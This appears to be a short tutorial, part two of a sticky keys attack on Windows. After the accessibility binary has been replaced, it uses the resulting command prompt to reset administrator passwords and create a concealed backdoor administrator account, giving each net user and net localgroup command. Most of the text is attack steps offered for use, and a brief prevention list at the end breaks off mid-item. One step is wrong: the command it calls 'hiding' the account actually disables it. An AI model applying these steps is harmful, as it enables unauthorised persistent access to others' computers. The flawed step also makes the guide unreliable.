This is part2 of my Intro for the sticky keys attack. After rebooting the system we can hit the Shift key 5 times to open a cmd prompt. (replacement of sethc.exe)
Now we can use the GUI or the cmd to install a backdoor user.
Method 1: GUI
In the cmd prompt we type: control userpasswords2
Choose User that is part of the administrator group and reset password or create one.
Method 2: Use the cmd
Get administrators list: net localgroup administrators
(You’ll get a list with all users that belong to the local admin group)
change password by typing: net user „username“ password
Login with new credentials, Enjoy!
Howto create a backdoor User
Create a new user: net user /add hiddenuser secretpassword
Add User to local admin group: net localgroup administrators hiddenuser /add
set user to hidden: net user hiddenuser /active:no
Check backdoor user visibility: control userpasswords2
The hiddenuser should not be shown.
Prevention from sticky boot attack
- encrypt your harddrive
- set bios password
- disable additional boot device possibilty (Flashdrives/USB/CD/DVD)
- Turn off Sticky keys: